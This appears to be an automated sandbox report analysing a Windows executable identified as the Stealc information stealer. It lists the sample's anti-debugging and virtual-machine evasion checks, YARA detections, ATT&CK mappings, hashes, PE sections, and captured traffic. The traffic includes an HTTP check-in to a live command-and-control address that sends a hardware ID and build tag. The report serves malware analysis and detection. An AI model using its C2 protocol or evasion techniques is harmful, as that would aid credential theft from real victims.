                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00094910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00094910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0008DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0008E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0008ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00094570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00094570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0008BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00093EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00093EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00081160 GetSystemInfo,ExitProcess,0_2_00081160
                Source: file.exe, file.exe, 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2191696889.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2191696889.0000000000D64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware}0P
                Source: file.exe, 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13539
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13542
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13594
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13554
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13562
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000845C0 VirtualProtect ?,00000004,00000100,000000000_2_000845C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00099860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099750 mov eax, dword ptr fs:[00000030h]0_2_00099750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00097850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00097850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6492, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00099600
                Source: file.exe, file.exe, 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00097B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00096920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00096920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00097850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00097850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00097A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00097A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2145893741.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6492, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2145893741.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6492, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/true
                  		unknown
                  http://185.215.113.206/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/Rfile.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/e2b1563c6670f193.php/file.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/e2b1563c6670f193.phpLZXfile.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/e2b1563c6670f193.php4Zfile.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206file.exe, 00000000.00000002.2191696889.0000000000D1E000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.206/wsfile.exe, 00000000.00000002.2191696889.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/gfile.exe, 00000000.00000002.2191696889.0000000000D64000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1543095
                                  Start date and time:2024-10-27 08:51:09 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 2s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:5
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 88
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/e2b1563c6670f193.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                  • 185.215.113.17
                                  S92Ayq3U9A.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.94776407612308
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'828'352 bytes
                                  MD5:e1d69985ce8b4cb34d5ceca422eb15c3
                                  SHA1:9382606ea46d759e13140c55d36ec6078c2186b1
                                  SHA256:0409e35a5fd1f875e55f4f615cb7e31376177a9e2f06e41209576346e9a4d4f7
                                  SHA512:22447878f06d5a0a83cd8684ad054aceae932493d7aba289c3e4be708ff4fec615265ef6e3d91ecaff80f24765708584f24ad4b4e51c3b151ace24b33418cb02
                                  SSDEEP:49152:2Y/wmHJY7yn8yTvzM4XXNrT5+3MRAfcQnwu:2YJJYen8szRXXlT5+3jcQnD
                                  TLSH:698533937C1203F6C16F71F0A67B0B629B52751D1192756A004661BC0FAB3A679C1EBF
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xa94000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F25ED3E015Ah
                                  pinsrw mm3, word ptr [ebx], 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  jmp 00007F25ED3E2155h
                                  add byte ptr [esi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx], cl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [esi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  push es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add bh, bh

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x25b0000x22800ece180ad5498df8aec20378f09f321f5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x25e0000x29c0000x200c7b3ccdb5b3ba5dac8ed84fa9b86dafbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  cjjmoofv0x4fa0000x1990000x198400c70a368a7ae6e6181d46ca7b66e71bbaFalse0.9947171138242499data7.953081730798391IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  pwxczyzg0x6930000x10000x400a3f7a67d081755a97a74c9b15ba624caFalse0.7255859375data5.719279495268627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x6940000x30000x2200e380c32798e8dca200e7aee39b3ff43cFalse0.07433363970588236DOS executable (COM)0.9606074680890394IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-27T08:52:06.786046+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649710185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 27, 2024 08:52:05.558475971 CET4971080192.168.2.6185.215.113.206
                                  Oct 27, 2024 08:52:05.564167023 CET8049710185.215.113.206192.168.2.6
                                  Oct 27, 2024 08:52:05.564393044 CET4971080192.168.2.6185.215.113.206
                                  Oct 27, 2024 08:52:05.565020084 CET4971080192.168.2.6185.215.113.206
                                  Oct 27, 2024 08:52:05.570303917 CET8049710185.215.113.206192.168.2.6
                                  Oct 27, 2024 08:52:06.490541935 CET8049710185.215.113.206192.168.2.6
                                  Oct 27, 2024 08:52:06.490742922 CET4971080192.168.2.6185.215.113.206
                                  Oct 27, 2024 08:52:06.494079113 CET4971080192.168.2.6185.215.113.206
                                  Oct 27, 2024 08:52:06.499478102 CET8049710185.215.113.206192.168.2.6
                                  Oct 27, 2024 08:52:06.785945892 CET8049710185.215.113.206192.168.2.6
                                  Oct 27, 2024 08:52:06.786046028 CET4971080192.168.2.6185.215.113.206
                                  Oct 27, 2024 08:52:09.066016912 CET4971080192.168.2.6185.215.113.206

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.649710185.215.113.206806492C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 27, 2024 08:52:05.565020084 CET90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Oct 27, 2024 08:52:06.490541935 CET203INHTTP/1.1 200 OK
                                  Date: Sun, 27 Oct 2024 07:52:06 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 27, 2024 08:52:06.494079113 CET412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJK
                                  Host: 185.215.113.206
                                  Content-Length: 210
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 30 33 39 45 34 35 34 36 41 36 38 39 34 36 31 37 39 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a
                                  Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="hwid"6D039E4546A6894617998------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build"puma------EGCBAFCFIJJJECBGIIJK--
                                  Oct 27, 2024 08:52:06.785945892 CET210INHTTP/1.1 200 OK
                                  Date: Sun, 27 Oct 2024 07:52:06 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:03:52:01
                                  Start date:27/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0x80000
                                  File size:1'828'352 bytes
                                  MD5 hash:E1D69985CE8B4CB34D5CECA422EB15C3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
